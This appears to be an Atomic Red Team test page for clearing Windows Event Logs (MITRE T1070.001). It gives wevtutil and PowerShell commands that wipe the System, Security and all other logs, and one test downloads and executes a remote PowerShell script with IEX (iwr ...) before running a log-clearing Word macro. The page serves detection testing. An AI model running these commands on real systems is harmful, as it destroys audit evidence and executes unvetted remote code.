Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Windows Event Logs are a record of a computer's alerts and notifications. There are three system-defined sources of events: System, Application, and Security, with five event types: Error, Warning, Information, Success Audit, and Failure Audit.The event logs can be cleared with the following utility commands:
wevtutil cl systemwevtutil cl applicationwevtutil cl securityThese logs may also be cleared through other mechanisms, such as the event viewer GUI or PowerShell.
Upon execution this test will clear Windows Event Logs. Open the System.evtx logs at C:\Windows\System32\winevt\Logs and verify that it is now empty.
Supported Platforms: Windows
| Name | Description | Type | Default Value |
|---|---|---|---|
| log_name | Windows Log Name, ex System | String | System |
wevtutil cl #{log_name}Clear event logs using built-in PowerShell commands. Upon successful execution, you should see the list of deleted event logs Upon execution, open the Security.evtx logs at C:\Windows\System32\winevt\Logs and verify that it is now empty or has very few logs in it.
Supported Platforms: Windows
$logs = Get-EventLog -List | ForEach-Object {$_.Log}
$logs | ForEach-Object {Clear-EventLog -LogName $_ }
Get-EventLog -listThis module utilizes WMI via VBA to clear the Security and Backup eventlogs from the system.
Elevation is required for this module to execute properly, otherwise WINWORD will throw an "Access Denied" error
Supported Platforms: Windows
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1070.001\src\T1070.001-macrocode.txt" -officeProduct "Word" -sub "ClearLogs"try {
New-Object -COMObject "Word.Application" | Out-Null
Stop-Process -Name "winword"
exit 0
} catch { exit 1 } Write-Host "You will need to install Microsoft Word manually to meet this requirement"